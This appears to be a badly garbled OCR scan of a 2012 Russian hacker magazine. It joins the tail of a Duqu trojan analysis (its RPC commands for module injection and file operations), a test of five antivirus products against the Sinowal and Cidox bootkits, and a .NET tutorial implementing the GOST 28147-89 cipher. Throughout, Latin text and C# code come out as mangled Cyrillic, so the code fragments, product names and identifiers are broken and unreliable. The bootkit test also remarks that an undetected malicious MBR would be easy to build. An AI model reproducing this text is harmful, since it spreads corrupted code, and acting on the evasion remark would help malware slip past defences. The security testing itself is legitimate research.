• ВрсНапШег_2 — выполняетинжектмодуля вуказанный процесс и 
вызывает указа иную функцию экспорта; 

• ВрсНапс!1ег_3 — загружаетмодуль и выполняетего сточки входа; 
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Рис. 12. Декомпилированный код обработчика, который возвращает номер версии 
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Функциональность Зіихпеі ѵз. йици 



• ВрсНапсіІег_4 — запускаетпроцесс посредством вызова 
Сгеа^еРгосеззО; 

• ВрсНапсІІег_5 — читает содержимое указанного файла (например, 
конфига); 

• ВрсНапсІІег_6 — записывает данные вуказанный файл; 

• РрсНапсПег_7 — удаляетуказанный файл из системы. 

Декомпилированный код обработчика, который возвращает 
номер версии, представлен на рисунке 12. 

Использование РРС-протокола позволяет троянцу оставаться 
незамеченным и не вызывать подозрений со стороны различного 
защитного ПО. 



ЗАЧЕМ ЭТО ВСЕ? 



В рамках одной статьи не представляется возможным рассказать 
обо всех технических нюансах этой вредоносной программы — один 
наш аналитический отчет по Біихпеі занял более 80 страниц :), — 
поэтому в завершение я предлагаю тебе задаться вечным философ- 
ским вопросом «зачем?». 

Уже ни для кого не секрет, что многие государства формиру- 
ют специальные военные подразделения для создания средств 
нападения в киберпространстве. Разрабатываются доктрины, 
регламентирующие последовательность действий во время 
кибервойны. Возможно, что история со Віихпеі, а теперь и с Оіщи 
представляет собой как раз результат работы одного из таких вот 
подразделений. Сейчас сложно сказать, какова истинная цель и 
предназначение Оици, так как в этой истории еще слишком много 
белых пятен, тем более что функционал этой вредоносной про- 
граммы может различаться для разных целей, а дополнительно за- 
гружаемые модули расширяют ее возможности. На данный момент 
также обнаружен модуль-кейлоггер, который устанавливался на 
некоторые зараженные машины. Но это уже тема для отдельной 
статьи, а те, кто хотят разобраться во всем самостоятельно, смогут 
найти некоторые компоненты Оіщи в Сети. НЕ 



ХАКЕР 01 /156/2012 



083 










ВтЭЕРЕЫОЕК, Е5ЕТ N0032, Р-5ЕС1ШЕ 

5ІЫ6 ПРОТИВ 



01ЛР05Т 5ЕСІІРІТѴ, 

# «ЗАГРУЗОЧНЫХ» УГРОЗ 



Вирусы, заражающие МВк, существуют давно 
они появились уже во времена М5-005, когда 
мы с тобой играли в Ооопп 2 и были молодыми 
и красивыми. В последние несколько лет 
они снова подняли голову — теперь все их 
боятся и называют модным словом «буткиты». 



А что говорят по этому поводу товарищи 



антивирусы? Могут ли они бороться с такими 
угрозами? Вот это-то мы и проверим! 



Логсканирования ОиІрозІБесигіІуБиіІе Рго 7.5 
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Детектирование ЗіпоѵѵаГа ІЧОО'ом 

угрозами в МВП'е и Вооі-секторе у нас сегодня будут сра- 
I ^ жаться пять продуктов: 

1) ВіШеІепсІег ІпІегпеіЗесигіІу 2012 — в последнее время этот анти- 
вирус здорово набрал обороты, к тому же движок В іЮеІ покупают 
несколько сторонних компаний. Интересно посмотреть, что он из 

- себя представляет. 

*' “ЕЗЕТ М0032 5тагі5есигі^у 5 — тут и комментировать нечего, это 

второй по популярности антивирус в России после«Каспера». 

3) Р-Зесиге Іп1:егпеіБесигі1:у2012 — достаточно известный продукт 
финской секьюрити-компании. 

4) ОиІрозіЗесигіІуЗиіІе Рго7.5 — продуктоткомпании Адпиііт, кото- 
рая делает классный файервол. Между прочим, ха л явный файер- 
вол отОиІрозІ в свое время пользовался в нашей стране огромной 
популярностью. Пожалуй, сейчас его место в наших сердцах за ня л 
тоже халявный и всесторонне могучий Сотосіо. 

Різіпд ІпІегпеіЗесигіІу — антивирус откитайской компании Різіпд. 
Посмотрим, на что способны китайцы. 

І_ЕТТНЕ С0ІМТЕ5Т ВЕ6І N 

^Ь^Первым делом я заразил ѴѴіпсІоѵѵв ХР 5РЗ на ѴтѴѴаге буткитом 

ЗіпоѵѵаІ, который известен, обрати внимание, аж с 2009 года. Затем 
я с помощью Ніеѵѵ убедился, что МВР действительно изменен, и 
стал поочерёдно устанавливать все продукты и сканировать (или 
пытаться сканировать) систему. 

Тестирование я начал с ВіЮеІепсІег'а. Для меня стало неожи- 
данностью, что этот антивирус вообще не смог установиться! На 
середине установки он предложил мне перезагрузить компьютер, 
а после перезагрузки открылось окно установщика (и по совмести- 
тельству боѵѵпіоасіег'а), прогресс-бар в котором показывал 55 %. По 
прошествии некоторого времени эта цифра так и не изменилось. 
По-видимому, установленный ЗіпоѵѵаІ помешал ВіЮеІепсІег'у, что 
весьма грустно. 

Ну а следующий испытуемый — N0032 — не подвёл. Он успеш- 
но обнаружил не только сам дроппер в Іетр'е, но ещё и выявил за- 
ражение МВП'а. Очень радует, что этот популярный в России анти- 
вирус способен справляться с достаточно серьёзными угрозами. 



Срабатывание Р-5есиге Іпіегпеі Бесигііу на ЗіпоѵѵаІ 

Антивирус Р-Зесиге Іпіегпеі Зесигііу также успешно разобрался 
с буткитом и обозвал его ѴѴіп32/МеЬгооІ, как и N0032. Любопытно, 
что в столбце «Объект» в 6Ш указано просто «Заражение систе- 
мы». По-видимому, разработчики решили не пугать пользователей 
страшными названиями вроде МВР и «загрузочный сектор». :) 

А вот Оиірозі несколько разочаровал: он обнаружил только 
файловые компоненты ЗіпоѵѵаГа, а заражённый МВР пропустил. 
Пожалуй, продукт от Адпііит — это все-таки в первую очередь 
файервол, а не антивирус. 

Різіпд вообще не удалось привести в работоспособное состоя- 
ние. Я несколько раз пытался установить и нормально запустить 
китайское изделие, но потерпел неудачу. Сначала я было подумал, 
что проблема в ѴтѴѴаге, но оказалось, что это не так (подробнее 
читай дальше). По-видимому, именно ЗіпоѵѵаІ не дал антивирусу 
инсталлироваться. 

ЕЩЕ ОДИН БУТКИТ: 6НСЮ0ѴѴ 

После того, как все пять антивирусов были протестированы на 
системе, заражённой ЗіпоѵѵаГом, я решил откатиться к чистому 
снэпшоту и запустить дроппер другого буткита. Хотя второй буткит 
не так широко известен, как ЗіпоѵѵаІ, антивирусы всё равно долж- 
ны его детектировать, поскольку это злой вирус, который делает 
в системе много чего нехорошего. Называется он ѴѴіп32/СЬосІоѵѵ. 
NА^ (по данным ЕЗЕТ). В дальнейшем я буду называть его просто 
СЬосІоѵѵ. 




Нкчг, [і'уім іНгтеО 



І Іігчѵ р Нріа сі^і ііѵО 



МВР, заражённый ЗіпоѵѵаГом 



Модифицированный код МВР 
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МАІ_ЖАКЕ 



Греков Сергей (ШрѴ/дгоир. хакер. ги) 



I ІА 1 ^іигі % 



О Тревога 

обнаружена уграми 

Объект: МЁ^сечтер Ф^іііу^могс дічм О 
Угроза: Ит ЩШ&ьи.П ао тоол ноем пмгрімма 
Передайте абквчт а і№Л)Чш 0 Е5ЕТ Д/ій а-іГшіа. 

О Очистить . Р*^м*иДу#ТСй 

Ё 1Т&Н 0^.*ЧТ-а СОД*№іТСЙ ЮІМРХ^Гг тТЙй^ ДГЙ 

^(пыйггеоэ, Щн*&в 0ѵ«каід пот^*г полностью 

УДВГЛТЬ ВОЗМОЖНУЮ ѴГР05У С ВДМПіЧГ^РВ. 




Ничего не предпринимать - н& мкомендуется 
из ніличие гк^онной угроз* ■ данный 
объект не будет очищен шін удіпа-; и останется м» 



*йин*чгг#р# г 

т ПаШШТЪ ГЛРІМІТРы 



Окно срабатывания ЕБЕТ Бтагі Бесигііу 5 на буткит СІіосІоѵѵ 



МкшаГі Ѵі$ч4І С* ■ Кшрікін ИЬгогу 



РіХКіЛіЕлОг' 



Рігодгаго, Сі^тодглт РІк№ійі^1Я1^ятиііи»мв 



тНііі№ки№лЬкіт)цейеіЕ(Ье Рий№№№і№{ *г лпитни^у 



№\ 



УІСГй&йіг ѴкилІ С- ■ НкігГітг- 1 Штагу 



Аігіііш Еіййг) 

Ргодгмп: С№чгмп ТЗ^Тгау.™ 



ТЬ* Ар^к^лі На* гечсггіеЬ ІЬг ДъГйжпе Ы ІягііігаІІл І. р пт сААийй ѵ*4у. 
И?«? «Р^ЙЧп'? ^ Рі7С 



Сообщения, выдаваемые при запуске Кізіпд Іпіегпеі Бесигіі 



Антивирус ВіЮеІюпсІег снова постиг провал: на этот раз он не 
прошёл даже первый этап установки — «Сканировать системные 
файлы на наличие вирусов». Мастер установки предлагал мне 
несколько раз перезагрузить компьютер, загрузиться в ВіЮе^епсІег 
Резсие Мосіе, который представляет собой *піх-систему с анти- 
вирусным сканером, и выполнить многие другие действия. Однако 
в конечном итоге установщик выдал примерно такое лаконичное 
сообщение: «Установить ВіЮеіюпсІег не удалось». 

Ну а N0032 и здесь не подкачал: он успешно обнаружил второй 
буткит в «МВР-секторе физического диска О». 

Но того, что произошло дальше, я совсем не ожидал. Ни один из 
трёх оставшихся антивирусов не смог обнаружить заразу в МВР'е, 
хотя каждый из них корректно установился и обновился. Более 
того, я пробовал различные варианты сканирования — от ріііск/ 
поверхностного до руткит-сканирования системы. Однако ни один 
из них не привел к положительному результату, были обнаружены 
только компоненты буткита в файловой системе, что, конечно, не 
радует. 

ПОПРОБУЕМ ПО-СВОЕМУ 

Однако руки мои продолжали чесаться, и я решил не останавли- 
ваться на достигнутом и сделать нестандартный МБР. Я написал в 



Ніеѵѵ небольшой код, который копировал область памяти размером 
0x200 с адреса 0x200 на адрес 0x1000 и передавал туда управ- 
ление. Код, конечно, безвредный, но мне было любопытно, как 
отреагируют антивирусы на нестандартный МБР. Стоит отметить, 
что в этом случае и ВіЮеІюпсІег, и Різіпд успешно установились, 
обновились и заработали. Таким образом, моё предположение о 
том, что установленные буткиты могут мешать инсталляции анти- 
вирусов, подтвердилось. 

Оказалось, что измененный МБР совершенно не трогает 
железные сердца антивирусов. Таким образом, я предположил, 
что буткиты детектируются обычными сигнатурами и сделать 
вредоносный МБР, который бы не обнаруживался, совсем не про- 
блема. Для проверки я проделал аналогичную операцию с кодом 
ЫТРБ-загрузчика (по сути, с кодом бут-сектора) и получил тот же 
результат. 

ЗАКЛЮЧЕНИЕ 

Какие можно сделать выводы по результатам теста? Антивирусы 
недостаточно хорошо детектируют буткиты. На компьютер, инфи- 
цированный буткитом, встанет не каждый антивирусный продукт. 
Так что держись и, главное, не забывай перед выключением ком- 
пьютера в дисководе А: сомнительные дискеты ;). ПИ 



Л1Г 









Окно установщика ВіШеГепсІег 2012 



Окно успешно установленного ВіЮеГепсІег, только что Установка ВіЮеГепсІег 2012 

просканировавшего компьютер 
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Ргеѵіехл/ 



ІЖІХОІО 



СВОЯ ПРОШИВКА ДЛЯ АИОКОІО 

Альтернатная прошивка СуаподепМосІ, 
которую когда-то начилала разраба- 
тывать группа энтузиастов, сейчас 
установлена более чем на 2 миллионах 
АпсІгоісІ-устройств. Многие инсталят 
ее сразу после покупки телефона, от- 
казываясь от официальных Л гтѵѵаге. 

Но мало ктознает, что можносоздать 
свою собственную прошивку, и сделать 
это не так уж и сложно. За основу можно 
взятьуже существующую прошивкуи 
немного ее модифицировать, добавив 
необходимое ПО и подправив некото- 
рые системные параметры, влияющие 
на время отклика экрана, время жизни 
батареи, работуЗО-модуля и т.д. 

Это статья — полный мануал по сборке 
своей хакерской Ап 6 гоісі- прошивки для 
твоеготелефона. 

кодинг 
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1МІХОШ 



5УЫХАСК 








.ИЕТ-КРИПТОГРАФИЯ 




АТАКАФОРКОВ 




88 


Для шифрования по ГОСТу не надо самому 
реализовать крипто-алгоритмы. Все уже 


102 


Альтернативные ветки популярных проек- 
тов порой развиваютсятак стремительно, 


122 



нативно реализовано программистами что многие попростузабывают об их про- 

МісгобоК. И вродедаже не криво-накосо. родителях. ВотчтозначиторепБоигсе. 



ЗАЩИЩАЕМ ДАННЫЕ В «ОБЛАКЕ» 

Облачные провайдеры позволяютподнять 
100 серверов в один клик. Но и также про- 
сто позволяют ихуронить. Так можно л и 
доверять данные облачным провайдерам? 



5ѴЫХАСК 



РЕККІЖ 



ФРИКИНГ 
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БУМАЖНАЯ РАБОТА БЕЗОПАСНИКА 

Что на самом деле значит «безопасная 
система» для регулирующих органов? 
Увы, совсем не то же самое, что система, в 
которой нетуязвимостей. 
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ТЕСТ-ДРАЙВ ЫАЗ'ОВ 

Сетевыехранилища изстарого Репііит и 
ЮЕ-дисков — зих! Нам нужна производи- 
тельность, объем под 12 Тб и возможность 
поднять на ИАБ'е полезные сервисы. 
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ЮОРВО БЛАГО 

Когда всетщательно избегаютсозда- 
ния петли в локальной сети, пытливый 
ум фрикера придумывает, какизвлечь 
из нее пользу. Сумасшедший. 
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ріаіпіехі ШгзМсІрІаіпІехГзи, ѵѵѵѵѵѵ.ріаіпіехі.зи] 




РАЗБИРАЕМСЯ С КРИПТОГРАФИЧЕСКОЙ 
ПОДСИСТЕМОЙ .ЫЕТ РКАМЕѴѴОКК 



гш 

Исходники всех 
примеров смотри 
на прилагаемом к 
журналу диске. 



Сегодня сложно найти 
информационную систему, 
которая бы не использовала 
криптографию. Коммерческие 
системы в большинстве своем 
используют криптографические 
примитивы, которые внесены 
в стандарты в США, но порой 
возникают ситуации, когда такой 
вариант просто неприемлем. 
Здоровый партриотизм, 
отсутствие доверия и некоторые 
законы наталкивают нас на 
мысль о применении своих 
алгоритмов, определенных 
в наших государственных 
стандартах (ГОСТах). 



ІШП 

• Бігопд пате сборки 

— набор параметров, 
включающий в себя 
имя сборки, версию, 
информацию 

о культуре, а 
также открытый 
ключ и значение 
электронной 
подписи. 

• Криптографический 
примитив — 
обобщенное 
название 
какого-либо 
криптографического 
алгоритма или 
протокола. 

Ѵ!ИШ 

• Шр://дасЬгоуузег. 
Ыоазроі.сот/ — сайт 
разработчика 6АС 
Вгоѵѵзег. 

• Ыиу/иух2з5 

— статья о том, 
как реализовать 
алгоритм по ГОСТу 
28147-89 на С#. 



этой статье я расскажу о том, как устроена криптографи- 
ческая подсистема .ЫЕТ Ргатеѵѵогк, представленная в 
пространстве имен ЗувІет.ЗесипІу.СгурІодгарЫ, а также 
о том, как реализовать свой алгоритм в стиле .ЫЕТ Ргатеѵѵогк и 
заставить СІ_Р использовать его в качестве криптографического 
алгоритма по умолчанию. 

Это поможеттебе как в разработке собственных криптопровай- 
деров для .ЫЕТ, так и во внедрении уже существующих библиотек с 
криптографическими алгоритмами. 

5У5ТЕМ.5ЕСІІРІТУ.СРУРТ06РАРНІ 

Все, что касается криптографии, в .ЫЕТ Ргатеѵѵогк находится в 
пространстве имен ЗувІет.ЗесипІу.СгурІодгарЫ, которое условно 
можно разделить на следующие составляющие: 

• криптографические примитивы — набор классов, применяемых 
для реализации алгоритмов шифрования, хеш-функций ит. д.; 

• вспомогательные классы — отвечаютза генерацию случайных 
чисел, шифрование на основе потоковой модели и т.д.; 

• сертификатыХ.509 и цифровые подписи ХМЬдокументов 
(ХМІ_5ідпаІиге). 

Что касается криптографических примитивов, то для всех 
их типов имеются абстрактные классы и интерфейсы, от кото- 
рых наследуются конкретные программные реализации алго- 
ритмов (см. рисунок 1). Так, любая реализация симметричного 
алгоритма шифрования должна наследовать абстрактный 
класс ЗуттеІпсАІдопіЬт, алгоритм с открытым ключом — 
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АззутеІгісАІдогШпт, функции хеширования — НазЬАІдогШпт 
или КеуесШазЬАІдогШпт в зависимости оттого, ключевая это 
или бесключевая хеш-функция. В .ЫЕТ в основном реализованы 
алгоритмы, описанные в стандартах, которые действуют или 
действовали ранее за рубежом. Нашего ГОСТа 28147-89 среди них, 
естественно, нет, поэтому я использовал именно этот алгоритм 
для своих примеров. 

5ѴММЕТРІСАІ_60РІТНМ 

Как я уже упомянул, для реализации симметричных алго- 
ритмов в .ЫЕТ Ргатеѵѵогк используется абстрактный класс 
5уттеІпсАІдогШ"іт. Согласно М50ІМ, в этом абстрактном классе 
обязательно необходимо переопределить следующие четыре 
метода: 

риЬІіс ѵігііиаі ІСгуріоТгапБ-Ронп СгеаІіеРеспурІіогП ; 
риЫіс ѵігііиаі ІСгуріоТгапБ-Рогт СгеаІіеЕпспѵрІіогП ; 
риЬІіс аЬ5~ЕгасЕ ѵоісі Сепега1:еІѴ( ) ; 
риЫіс аЬБігасі: ѵоісі Сепега1:еКеу( ) ; 




Основные классы криптографических примитивов в .МЕТ Ргатеѵѵогк 



С последними двумя методами все понятно, они необходимы 
для выработки ключа и вектора инициализации, и реализовать 
их не составляеттруда. Необходимо разобраться, что представ- 
ляет собой интерфейс ІСгурІоТгапзіюгт в первых двух методах. 
МЕРЫ выручает нас и на этот раз. Согласно документации, 
ІСгурІоТгапзІюгт позволяет реализовать четыре свойства и три 
метода. Вот самые интересные из них: 

іпі: Тпап5-РоптВ1оск(Ьу1:е[] іприіВи-р-Рег . 
іігЕ іпри іО-р-рБеІ:. іпі іпрігЕСоипІ: . 

Ьѵііе [ 1 оиіриіВи-р-Рег., _±_п^ оиІіриІіО-р-РзеІ: ) ; 



ЬуЬе[ ] Тгап5-РогтРіпа1В1ос к(Ьѵ1:е[ ] і приіВи-р-Рег . 

іпі: іприіО-р- РзеІ:. іпі: іприіСоипЫ ; 

Первый отвечаетза преобразование промежуточного блока 
данных, второй — за обработку последнего блока. В МЕРЫ также 
говорится, что «классы блочных шифров, являющиеся произво- 
дными класса ЕуттеІгісАІдопіЬт, используют режим сцепления, 
называемый сцеплением блоков шифротекста (СВС)». 

Это порождает определенную проблему, так как отечествен- 
ный стандарт ГОСТ 28147-89 определяет четыре режима работы 
алгоритма, среди которых СВС нет. Однако вскрытие показало, что 
.ЫЕТ Ргатеѵѵогк'у все равно, как цепляются блоки, поэтому будем 
использовать режим гаммирования с обратной связью (СРВ). На 
данном этапе у нас уже достаточно сведений, чтобы перейти непо- 
средственно к кодингу. 

КОДИМ ГОСТ28147-89 

Будем исходить из того, что реализация алгоритма Г0СТ28147-89 
в режиме ЕСВ (простой замены) уже имеется и сосредоточимся 
только на том, что касается .ЫЕТ Ргатеѵѵогк'а и режима СРВ. 
Создадим скелет класса бозКЛЬ, который будем постепенно на- 
полнять кодом. 



{ 



} 



зрасе 605І: 

риЬІіс сІаББ 6о5І:С-РЬ : 5утте1:гісА1§огі1:Ьт 



риЬІіс С оБіС-РЬПО 

риЬІіс оѵеггісіе ІСгѵріоТгапБ-Рогт СгеаіеРесгѵрІіог 

ЬуЕе[] г^ЬКеу. 

ЬуЕе [] г^ЫѴ 

Л} 

риЬІіс оѵеггісіе І СгуріоТгапБ-Рогт СгеаіеОесгур1:ог( ) 

{} 

риЬІіс оѵеггісіе ІСгѵріоТгапБ-Рогт СгеаіеЕпсгѵріог 

і_ 

ЬуЬе[] г^ЬКеѵ. 

Ьѵііе [ ] г§ЬІѴ 

ю 

риЬІіс оѵеггісіе І СгѵріоТгапБ-Рогт Сгеа1:еЕпсгур1:ог( ) 

и 

риЬІіс оѵеггісіе ѵоісі 6 епегаіеІѴО{} 
риЬІіс оѵеггісіе ѵоісі 6епегаіеКеу(){ } 



Местами в коде я буду использовать два статических метода. 

ргіѵаіе зіаііс ЬуЬе[] беіКапсІотВуІіеБСіпІ: ЬуЕеБСоипЫ 
ргіѵаіе Біаіііс ѵоісі 6атт(Ьуіе[] іприі. 

Ьѵііе Г 1 §атта л Ьѵііе [ "| оиіриі) 

Первый с помощью встроенного в систему генератора случай- 
ных чисел выдает массив со случайными данными. Второй просто 




ВСКРЫТИЕ ПОКАЗАЛО, ЧТО .ЫЕТ 
РРАМЕѴѴОРК'У ВСЕ РАВНО, КАК 
ЦЕПЛЯЮТСЯ БЛОКИ, ПОЭТОМУ 
БУДЕМ ИСПОЛЬЗОВАТЬ РЕЖИМ 
ГАММИРОВАНИЯ С ОБРАТНОЙ 
СВЯЗЬЮ (СРВ) 
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Подпись сборки 

осуществляет ХОР двух массивов. На диске, прилагаемом к 
журналу, ты сможешь найти исходники этих статических методов. 
Функция СеіПапсІотВуІез легко позволяет реализовать методы 
ОепегаІеІѴ и ОепегаІеКеу: она просто генерирует случайные дан- 
ные и присваивает соответствующие массивы свойствам ІѴѴаІие и 
КеуѴаІие, которые служат для хранения вектора инициализации и 
ключа шифрования соответственно. 

В конструкторе нашего класса определяем возможные размеры 
блока и ключа. Эти размеры, указываемые в битах, для описанного 
в ГОСТе алгоритма равны 64 и 256 бит. 

риЫІе 6 о5~ЕОЕЬ() 

Ь_ 

І_е§а1В1оск5І2е5Ѵа1ие = [] 

{ пеш К еѵ5І2е5(64. 64., 0) }; 

І_ееа1Кеу 5І2е 5Ѵа1ие = пеы[] 

{ пеы К е у$І2е 5(256, 256„ 0) }; 

ВІоскБігеѴаІие = 64: 

КеѵБігеѴаІие = 256; 

} 



Прежде чем перейти к реализации методов СгеаІеЕпсгурІог 
и Сгеаіейесгуріог, определим внутри нашего класса ОозіСІЪ еще 
пару классов, наследующих ІСгурІоТгапзіюгт. 

ргіѵаііе веаіесі сіазз бозіСТЬТ гапзТогтЕпсг : ІСгуріоТ гапз-Рогт 

{} 

ргіѵаііе веаіесі сіэбб СюзіСТЬТ гапв-РогтОесг : ІСгуріоТ гапв-Рогт 



После этого реализовать методы типа СгеаІеЕпсгурІог не соста- 
вит труда — нужно просто создать и вернуть объект соответствую- 
щего класса. На этом закончу рассказ об основном классе бозЮЬ. 
Во всем, что осталось «за кадром», легко разобраться самостоя- 
тельно, заглянув в исходники. 



ВСЕ ОШ СОБРАНЫ В СПЕЦИАЛЬ- 
НУЮ ДРЕВОВИДНУЮ СТРУКТУ- 
РУ, КАЖДЫЙ ЭЛЕМЕНТ КОТО- 
РОЙ АССОЦИИРОВАН С ИМЕНЕМ 
И ЧИСЛОМ, ИСПОЛЬЗУЕМЫМ 
ПРИ ПЕРЕДАЧЕ ДАННЫХ 



О ю 



В открытом мире информационных технологий и 
телекоммуникаций часто возникает потребность сослаться на 
какой-либо «объект», причем ссылка должна быть уникальной и 
универсальной. Обычно в данном случае под «объектом» понимают 
тип данных (например, формат файла), а не их единичный экземпляр 
(например, конкретный файл). Многие стандарты определяют 
некоторые объекты, которые нуждаются в точной идентификации. 
Такая точная идентификация достигается за счет присвоения 
каждому объекту своего идентификатора ОЮ (оЬ]есі ісіепіііісаіог), 
причем присвоение может осуществлять любая из заинтересованных 
сторон. Все ОЮ собраны в специальную древовидную структуру, 
каждый элемент которой ассоциирован с именем (слово, 
начинающееся с маленькой буквы) и числом, используемым 
при передаче данных. Семантически ОЮ представляет собой 
упорядоченный список компонентов объектного идентификатора 
(агсз), например: 

"{ □оіп1=-І50-і1=и-1=(2) сІ5 ( 5) аі1ігіЬи1іеТуре(4) 

сІізііп^иІБІіесІМатеСДЭ)}" 

ИЛИ 

"2.5.4.49 м 



Регистрационное дерево идентификаторов управляется 
децентрализовано (каждый узел не налагает никаких ограничений 
на дочерние узлы). Проект АЗЫ. 1 поддерживает репозиторий, 
который собирает информацию об объектах и их идентификаторах, 
но из-за децентрализации собрать все идентификаторы в одном 
месте не представляется возможным. Репозиторий располагается по 
адресу ѵѵѵѵѵѵ.оісі-іпіо.сот . 

А5ІЧ.1 — абстрактно-синтаксическая нотация — языкдля 
описания абстрактного синтаксиса данных, который состоит из 
набора формальных правил для определения структуры объектов, 
не зависящих от конкретной машины. Технологию А5ІМ.1 широко 
используют как в ІТІІ-Т, так и в других организациях, занимающихся 
стандартизацией. Эту нотацию также поддерживают многие 
производители программного обеспечения. 



КЛАСС 605ТСРВТРАМ5Р0РМЕІМСР 

Я уже говорил, что на основе реализации стандарта, описанного в 
ГОСТе, в режиме ЕСВ собираюсь реализовать режим СРВ, в котором 
шифрование осуществляется по схеме, представленной на рисунке 
2 (по сути, надо просто ее закодить). Заведем несколько приватных 
членов для хранения ключа шифрования и вектора инициализа- 
ции (состояния) и один вспомогательный массив, подлине равный 
блоку данных. 

// Ключ шифрования 

ргіѵаііе Ьѵі: [] т_Кеу ; 

// Сначала вектор инициализации, ну а потом 

// пром ежуточные значения 

ргіѵаііе Ьуіе[] т_5ѣа1іе: 

// Вспомогательный массив 

ргіѵаііе ЬѵіеП ІітрБІіаІіе; 

Сам метод шифрования промежуточного блока реализуется 
следующим образом: 

риЬІіс іпі Тгап5-РонпВ1оск( ) 
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Ьѵііе [ ] рІаіпВІоск = пеш Ьуіе[8]: 
іпі: гезиіі: = 0; 



шІііІеГ іприіСоипІ: > 0) 



// Копируем блок открытого текста 

Аггаѵ.СорѵСіприіВи-р-Рег. іприіО-РТзеІ:. рІаіпВІоск. Ѳ.8Ѵ. 

605 1=2 8147. 6о5І=28147Е сЬ ( т _$1:а1=е. і трБіа іе , т _Кеу ) : 

6атт(р1аіпВ1оск., ітрБіаіе., т_5і:аі:е); 

Аггау .Сору(т_51=а1:е л 2 >, оиіриіВиТ-Рег., оиіриіОТ-РзеІ:., 8) 

іприіСоипі -= 8; 

іприііО-р-РзеІ: += 8; 

оиІіриІіО-р-РзеІ: += 8; 

гезиіі: += 8; 



геііигп гезиіі:; 



Из приведенного куска кода я выкинул несколько строк, 
которые не влияют на суть. Как видно, здесь выполняется шиф- 
рование текущего состояния, а затем над результатом и блоком 
открытого текста осуществляется ХОР. Полученный шифрован- 
ный текст, являющийся новым состоянием схемы, записывается 
в выходном массиве и сохраняется в приватном члене класса. 

Метод ТгапзРогтРіпаІВІоск аналогичен по функционалу методу 
ТгапзРогтВІоск, поэтому приводить здесь его код я не буду. Скажу 
лишь только, что для шифрования последнего неполного блока 
берется столько же байтов промежуточного состояния, сколько 
байтов содержится в последнем неполном блоке. 

Класс СозЮЬТгапзіюгтОесг реализуется аналогично классу 
СозіСЛэТгапзіюгтЕпсг, только в данном случае опираться надо 
на схему дешифрования СРВ, понять принцип которой, я думаю, 
ты сможешь сам (ну а если не сможешь, ее легко восстановить по 
исходникам на диске]. 



КЕѴЕ0НА5НАІ_60РІТНМ 

С абстрактным классом КеуесШазЬАІдогШит все гораздо проще. Он 
происходит от абстрактного класса НазЬАІдогШот, при наследова- 
нии от которого необходимо переопределить всего два метода: 

рго1=ес1=есІ аЬзігасі ѵоісі НазІіСоге( 

Ьу1=е[] аггау. іпі: іЬБіагі. іпі: сЬБіге) 
ргоіесіесі аЬзігасі ЬуЕе[] НазІіРіпа1( ) 

Будем использовать указанный класс в качестве базового 
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СІ.В поумолчанию создает экземпляр нашего класса 

при реализации режима выработки имитовставки, описанного в 
ГОСТе 28147-89. Я снова возьму за основу программную реализа- 
цию базового преобразования (на этот раз 16 раундов описанно- 
го в ГОСТе алгоритма, так как режим выработки имитовставки 
использует только 16 раундов). Кстати, класс, производный 
от НазЬАІдогШот, реализуется практически также, как класс, 
который наследуется от КеуесЖазЬАІдогШот: переопределить 
надо те же самые методы. 



РЕЖИМ ВЫРАБОТКИ ИМИТОВСТАВКИ 

Режим выработки имитовставки по ГОСТу 28147-89 реализует- 
ся с помощью класса Созіітііо. Для этого присваиваем полю 
КеуѴаІие значение ключа и устанавливаем значение поля 
НазЬѴаІиеБіге равным 32, так как длина имитовставки составля- 
ет 32 бита. 

В переопределении метода НазЬСоге также нет ничего слож- 
ного — в итоге все сводится к использованию метода, работаю- 
щего с целыми блоками данных (в исходниках метод называется 
ІпІегпаІТгапзіюгт]. Каждый блок данных преобразуется в две 
переменные типа йѴѴОРО, к которым применяется 16-раундовая 
процедура шифрования, описанная в ГОСТе: 



иіпі: 1=ешрІпН = 605І28147. Ву1:е52РыогсІ (аггау . 

(ІПІ) (іЬБіагЬ + і * 8)); 
иіпі: іетріпі. = 6оз1:28147. Ву1=е52РыопсІ( аггау . 

(ІПІ) (іЬБіагЕ + і * 8 + 4)); 

иіпі: іетрОи1:Н = 0; 
иіпі іетрОціІ. = 0; 

603І28147. ЕпспѵріВІоскІбСпе-Р іетрІпН, пеТ іетріп!.. 
ге-Р іетрОиіН . ге-Р іетрОиЛ. 

605І28147.Р. КеуѴаІие ); 
иітііо іетрОиіН; 




Информация о сборке в 6АС Вгоѵѵзег 



В цикле сначала преобразуем блок данных (8 байт) в две пере- 
менные йѴѴОРО, затем применяем 16-раундовое шифрование по 
ГОСТу (ЕпсгуріВІоскІб), а после ксорим полученное значение с 
предыдущим. Преобразование блока данных в две переменные 
типа ОѴѴОРй необходимо, во-первых, для увеличения скорости 
работы алгоритма (ХОР двух значений типа ОѴѴОРй выполняется 
гораздо быстрее, чем ХОР двух четырехбайтовых массивов), а во- 
вторых, для удобства программирования. 

Метод НазЬРіпаІ реализуется аналогично, при этом неполный 
блок дополняется до полного нулями. 

На следующем этапе встраивания своего алгоритма в .ЫЕТ 
Ргатеѵѵогк необходимо добавить сборку в 6АС. 

ДОБАВЛЕНИЕ СБОРКИ В 6АС 

Если ты не новичок в .ЫЕТ, то наверняка слышал аббревиатуру 
САС, которая расшифровывается как СІоЬаІ АззетЫу СасЬе (гло- 
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бальное хранилище сборок). САС служит для хранения сборок, 
разработанных для нескольких приложений. Сборки, помещае- 
мые в глобальное хранилище, должны иметь зігопд пате, что, в 
частности, обязывает нас подписать сборку. 

Для начала необходимо сгенерировать пару ключей подписи, в 
чем тебе поможет утилита зп.ехе, которая идет в комплекте с .І\ІЕТ 
Ргатеѵѵогк. Открываем консоль и пишем: 

зп.ехе -к кеураіг.зпк 

Эта утилита генерирует открытый и секретный ключи подписи и 
записывает их в файл кеураіг.зпк. Теперь в свойствах нашего про- 
екта на закладке Сідпіпд необходимо поставить галочку напротив 
5ідп 1Ье аззетЫу и указать путь ктвоему файлу с парой ключей (см. 
рисунок 3). После делаем билд. Все, подписанная сборка готова. 

Сборки добавляются в САС с помощью специальной утилиты 
дасиііі, которая также поставляется с .ЫЕТ Ргатеѵѵогк. Если у тебя 
на компе несколько версий .ЫЕТ, ты должен выбрать утилиту для 
своей версии фреймворка, иначе сборка в САС не добавится. В 
консоли пишем: 

дасиіііі /і <Путь и имя сборки> 

Теперь нам надо узнать РиЫіс Кеу Токеп, версию и СиІІиге сбор- 
ки, что можно сделать при помощи либо САС Ехріогег, встроенного 
в ѴѴіпсІоѵѵз, либо бесплатной утилиты САС Вгоѵѵзег (см. рисунок 4). 

ИЗМЕНЕНИЕ КОНФИГУРАЦИИ 

Ріа втором этапе добавления нашего алгоритма в .ЫЕТ произво- 
